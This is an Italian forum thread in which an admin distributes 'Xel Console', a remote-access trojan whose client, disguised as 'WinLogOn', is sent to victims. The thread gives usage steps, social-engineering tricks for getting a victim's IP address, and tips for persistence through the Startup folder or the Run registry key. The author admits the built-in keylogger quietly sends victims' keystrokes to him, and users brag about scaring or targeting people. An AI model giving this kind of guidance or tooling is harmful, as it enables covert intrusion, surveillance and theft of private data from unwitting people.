Infernal Assailants

Xel Console v 2.0 Ultimate, Controllo remoto del computer.

« Older   Newer »
  Share  
icon3  view post Posted on 25/5/2011, 18:16
Avatar

Leo

Group:
Admin
Posts:
588
Location:
0Day

Status:


Xel Console v 2.0 Ultimate
SCREENSHOT!
xelconsole

dato che il 2nd MARSH si aggiorna da solo, l'immagine soprastante è da ritenersi vecchia.

Innovazione allo stato puro! XD
download QUI!!!




Xel Console v 1.0
non voglio Script kiddie

Ho messo la guida in questa sezione perche non è hacking...
intanto DOWNLOAD QUI
parto col dire che è una console fatta in una giornata niente di sofisticato... prossimamente aggiornerò la versione.

DI COSA SI TRATTA?
Semplice! di un controllo remoto! dentro l'archivio troverete 2 file (Xel Console ; WinLogOn ) WinLogOn lo dovete inviare alla vittima, mentre la console dovete aprirla voi.

COME SI USA?
una volta che la fantomatica "vittima" aprirà WinLogOn si avvierà una connessione nascosta e, voi, nella console dovrete mettere l'ip della vittima* una volta messo l'ip cliccate il tasto "CONNETTI" (non l'avresti mai detto...).

FUNZIONALITA'?
Tasti:
MESSAGGIO: invia un messaggio alla vittima con su scritto "Lamerato! Scoccia!".
SPEGNI: .-. a logica spegne il pc alla vittima...
APRI CD: gli apre il lettore cd\dvd
CHIUDI CD: chiude il lettore cd\dvd
KEYLOGGER: Sorry, ma questa funzionalità è abilitata solo a pochi... (successivamente a tutti).
C:\Shared: condivide il disco C:.

Una volta finito di lamerare cliccate DISCONNETTI.


*= per prendere l'ip ci sono diversi modi un è per esembio chiedergli di andare qui---> http://ilmioip.it/ e di farvi dire che numero appare, magari con qualche scusa (... he... sai mi serve per un gioco...per un attivazione di un anti virus... ecc....)



Xel is Everywere... :o:

Guida a scopo informativo ne io ne il forum ci assumiamo alcuna responsabilità dell'uso che ne farete!


In caso dasse l'errore di un certo file "MSWISCK.OCX" scaricare il file QUI e seguire la guida che segue...
scusate per questo file mancante.
PER WINDOWS XP E VISTA A 32 BIT:


mettere MSWINSCK.OCX nella cartella "C:\windows\system32"

•-su xp, aprire il menu start e cliccare su "esegui", quindi scrivere "cmd"

e cliccare su ok. Si aprirà il prompt dei comandi



-su vista a 32 bit invece, aprire il menu start e cercare con la barra in basso "cmd",

poi aprire il primo file della lista come amministratore (cliccarci su con il tasto destro e fare

"esegui come amministratore"). Si aprirà il prompt dei comandi



nel prompt dei comandi scrivere "regsvr32 c:\windows\system32\MSWINSCK.OCX",
naturalmente mettendo al posto di "nomefile" il nome del file
premere invio.

Si aprirà un messaggio che vi dirà che il file è stato registrato. Cliccate su OK.



PER VISTA A 64 BIT:
•Fare gli stessi passaggi di vista a 32 bit, ma mettere il file nella cartella

"c:\windows\SysWOW64" invece che in "system32",

e scrivere nel prompt dei comandi

"regsvr32 c:\windows\syswow64\MSWINSCK.OCX" invece di "regsvr32 c:\windows\system32\nomefile.ocx".

Si aprirà un messaggio che vi dirà

che il file è stato registrato. Cliccate su OK.



P.S.
Per fare una prova avviate sul vostro pc entrambi i file, e nella console mettete come ip 127.0.0.1



Licenza Creative Commons
Xel Console by Xel is licensed under a Creative Commons Attribuzione - Non commerciale - Non opere derivate 3.0 Unported License.
Permissions beyond the scope of this license may be available at https://infernalassailantssacred.forumfree.it/?t=55876292.



AGGIORNAMENTO: 02/05/2012
Sono state aggiunte le seguenti modifiche:
-Spegni monitor.
-Chiudi MSN.
-A:ShareEvery. (A: Admin, casomai non facesse il comando convenzionale, chiede conferma alla vittima)
-A:Open 139.
-Trova Hostname.
-Ostruisci porta.
-Comando Batch a distanza.
-INFO.
-Suggerimenti.


Edited by ForX92 - 7/8/2014, 19:10
 
Top
Cyberpeter
view post Posted on 26/5/2011, 14:32




Troppo forte!

Uno si è cagato sotto (aveva comprato il pc nuovo... xD )!
 
Top
view post Posted on 26/5/2011, 15:19
Avatar

Leo

Group:
Admin
Posts:
588
Location:
0Day

Status:


Almeno a qualcuno piace! ora sono più motivato! XD


CONSIGLIO: metterlo nella cartella eseguzione automatica:
percorso:
CITAZIONE
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

o meglio! con il Regedit in "run" <--- ma non è da tutti...
 
Top
Cyberpeter
view post Posted on 26/5/2011, 17:37




xD
 
Top
view post Posted on 26/5/2011, 19:34
Avatar

Leo

Group:
Admin
Posts:
588
Location:
0Day

Status:


Cyberpeter hai usato il tasto keylog vero? lo sai perche nella guida c'è scritto solo per pochi? perche per ora ricevo solo io i risultati XD se vuoi ti invio la sua conversazione...
P.P.S. nn l'ho letta tutta per "Privacy" solo che nn mi aspettavo un Keylog quindi volevo vedere di cosa si trattava...
 
Top
Cyberpeter
view post Posted on 27/5/2011, 13:03




CITAZIONE (Leo101‰ @ 26/5/2011, 20:34) 
Cyberpeter hai usato il tasto keylog vero? lo sai perche nella guida c'è scritto solo per pochi? perche per ora ricevo solo io i risultati XD se vuoi ti invio la sua conversazione...
P.P.S. nn l'ho letta tutta per "Privacy" solo che nn mi aspettavo un Keylog quindi volevo vedere di cosa si trattava...

Ti avviso non appena incastro uno che DETESTO CON TUTTO IL MIO CUORE, LA MIA ANIMA E SOPRATTUTTO IL MIO CORPO! (lo picchierò :D :lol: )
 
Top
view post Posted on 27/5/2011, 19:19
Avatar

Leo

Group:
Admin
Posts:
588
Location:
0Day

Status:


OK CON L'AGGIORNAMENTO BASTERA' CHE APRIATE 2nd MARSH PER AVERE LA CONSOLE SEMPRE AGGIORNATA (richiede connessione ad Internet, non somministrare ai bambini sotto i sedici anni per informazioni premere il tasto HELP!, può avere effetti indesiderati o anche gravi sul pc vittima [<-- questo siete voi a deciderlo! XD])
 
Top
Cyberpeter
view post Posted on 27/5/2011, 19:32




CITAZIONE (Leo101‰ @ 27/5/2011, 20:19) 
OK CON L'AGGIORNAMENTO BASTERA' CHE APRIATE 2nd MARSH PER AVERE LA CONSOLE SEMPRE AGGIORNATA (richiede connessione ad Internet, non somministrare ai bambini sotto i sedici anni per informazioni premere il tasto HELP!, può avere effetti indesiderati o anche gravi sul pc vittima [<-- questo siete voi a deciderlo! XD])

LoL!
 
Top
KekkOXStream
view post Posted on 15/6/2011, 16:18




scusa piacere francesco cvolevo dire che non trovo il link per vb6 se potresti postarmelo e postarmi anke una guida o un sito dove seguire la guida grazie infinite
 
Top
view post Posted on 18/6/2011, 08:02
Avatar

Leo

Group:
Admin
Posts:
588
Location:
0Day

Status:


Trovare vb 6 non è stato facile... ora và molto il 2010... comunque eccoti il download di vb6! QUI!

Edited by }{èL - 28/6/2011, 20:50
 
Top
°The Hacker°
view post Posted on 18/6/2011, 09:59




Complimenti leo =)
 
Top
KekkOXStream
view post Posted on 18/6/2011, 13:37




a okok allora cerchero io grazie per il download
 
Top
slashfanta
view post Posted on 6/9/2011, 17:52




ciao a tutti io ho un problema all'apertura della console, ho xp 32bit, "Component MSWISCK.OCX or its dependencices not correctly registered: a file missing or invalid" chiedevo se potreste aiutarmi, ciao e grazie a tutti!
 
Top
view post Posted on 12/9/2011, 14:12
Avatar

Leo

Group:
Admin
Posts:
588
Location:
0Day

Status:


Ho corretto il post, controlla se in quel modo funziona ;) scusami per il file mancante!
 
Top
bianriofranz
view post Posted on 16/12/2012, 13:19




ciao scusa lo hai creato con visual basic giusto? Volevo chiederti se potresti scrivermi a [email protected] mandondomi il link di qualche guida.. o cosa cercare perché non trovo veramente niente!! Grazie e complimenti per il programma
 
Top
16 replies since 25/5/2011, 18:16   1846 views
  Share